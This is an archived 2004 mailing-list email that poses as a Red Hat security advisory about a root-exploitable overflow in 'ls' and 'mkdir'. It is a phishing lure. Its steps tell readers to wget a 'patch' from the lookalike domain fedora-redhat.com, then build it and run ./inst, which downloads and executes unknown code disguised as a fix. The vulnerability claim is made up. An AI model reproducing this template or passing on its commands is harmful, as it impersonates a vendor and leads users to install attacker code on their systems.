Date: Sun, 24 Oct 2004 17:16:22 -0500
Message-Id: <200410242216.i9OMGMor025515@2ens11.uta.edu>
To: kernelnewbies@nl.linux.org
Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
From: RedHat Security Team <security@redhat.com>
Reply-To: security@redhat.com
X-Mailer: PHP/4.3.4
Received-SPF: 
X-Spam-Status: No, hits=-3.2 required=5.0 tests=AWL,BAYES_00,HTML_MESSAGE,
	HTML_TITLE_UNTITLED,MIME_HTML_ONLY autolearn=no version=2.63
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on humbolt.nl.linux.org
X-Spam-Level: 
X-ecartis-version: Ecartis v1.0.0
Sender: kernelnewbies-bounce@nl.linux.org
Errors-to: kernelnewbies-bounce@nl.linux.org
X-original-sender: security@redhat.com
Precedence: bulk
List-help: <mailto:ecartis@nl.linux.org?Subject=help>
List-unsubscribe: <mailto:kernelnewbies-request@nl.linux.org?Subject=unsubscribe>
List-software: Ecartis version 1.0.0
List-Id: <kernelnewbies.nl.linux.org>
X-List-ID: <kernelnewbies.nl.linux.org>
List-subscribe: <mailto:kernelnewbies-request@nl.linux.org?Subject=subscribe>
List-owner: <mailto:ecartis-owner@nl.linux.org>
List-post: <mailto:kernelnewbies@nl.linux.org>
List-archive: <http://mail.nl.linux.org/kernelnewbies/>
X-list: kernelnewbies
X-winbiff-received-account: SAKURA
X-winbiff-flags: @S-----------@

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
...style1 {font-size: 12px}
-->
</style>
</head>
<body>
<p><img src="http://www.redhat.com/g/chrome/logo_rh_home.png"></p>
<p> Original issue date: October 20, 2004<br>
Last revised: October 20, 2004<br>
Source: RedHat </p>
<p>A complete revision history is at the end of this file. </p>
<p>Dear RedHat user,</p>
<p>  Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.</p>
<p>The RedHat Security Team strongly advises you to immediately apply the<strong> fileutils-1.0.6 patch</strong>. This is a critical-critical update that you must make by following these steps:</p>
<ul>
  <li>First download the patch from the Security RedHat mirror: <strong><em>wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz</em></strong></li>
  <li>Untar the patch:<em><strong> tar zxvf fileutils-1.0.6.patch.tar.gz</strong></em></li>
  <li><em><strong>cd fileutils-1.0.6.patch</strong></em></li>
  <li><em><strong>make</strong></em></li>
  <li><em><strong>./inst</strong></em></li>
</ul>
<p>Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.</p>
<p>Thank you for your prompt attention to this serious matter,</p>
<p>RedHat Security Team.</p>
<p class="style1"> Copyright &copy; 2004 Red Hat, Inc. All rights reserved.   </p>
</body>
</html>

--
Kernelnewbies: Help each other learn about the Linux kernel.
Archive:       http://mail.nl.linux.org/kernelnewbies/
FAQ:           http://kernelnewbies.org/faq/